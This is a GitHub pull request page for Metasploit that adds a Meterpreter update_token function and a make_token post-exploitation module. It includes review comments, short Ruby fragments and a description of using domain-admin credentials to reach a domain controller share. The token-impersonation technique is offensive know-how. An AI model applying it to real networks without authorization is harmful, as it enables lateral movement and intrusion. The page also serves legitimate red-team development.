New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add update_token to MSF + make_token post-ex module #18022
Conversation
|
||
# send warning | ||
if logontype == 'LOGON32_LOGON_NEW_CREDENTIALS' | ||
print_warning("Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Do you have any context you can provide as to why this is only the case for this particular logon type?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I believe the LOGON32_LOGON_NEW_CREDENTIALS
logontype is the only one that duplicates the original access token of the user, thus has no result on local actions. It only updates the logon session ID to a new logon session with the specified credentials for network access
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
|
||
def run | ||
# Make sure we meet the requirements before running the script | ||
fail_with(Failure::NoTarget, 'This module requires a meterpreter session') unless session.type == 'meterpreter' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
BadConfig might be a better fit for this error because the session is user configurable.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@attl4s The payloads side of this has been landed and the gem has been bumped so we're no longer blocked on that. The last two things we need for this to get landed is for the module docs to be written and for the module to be linted. |
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems. |
|
Add update_token to MSF + make_token post-ex module
Everything looks good to me and I've gone ahead and landed this module.
I made a few minor changes in d8870d7 to bring the module docs inline with the standard format and address the warnings from msftidy_docs.rb. Thanks for this contribution! |
Release NotesThis adds the |
This PR adds the ruby code needed to leverage the new
update_token
function explained at rapid7/metasploit-payloads#648, for Meterpreter's stdapi extension. It also adds a new post-ex module using the new functionality:post/windows/manage/make_token
This module mimics Cobalt Strike's
make_token
command. In its default configuration, this module creates a new network security context with the specified logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and a new logon session is created and linked to that token. The token is then impersonated to acquire the new network security context. This module has no effect on local actions - only on remote ones (where the specified credential material is used) and it does not validate the credentials specified. For advanced users, the default logon type (LOGON32_LOGON_NEW_CREDENTIALS
) can be changed to any other valid value.An example can be seen below.
The Meterpreter session is running as
CAP\vegeta
(low-priv domain user). With plaintext credentials, we can use the new module to act on behalf ofCAP\bulma_da
(domain admin) in the network. As can be seen, the directory listing call to \dc01\C$ works after using the module.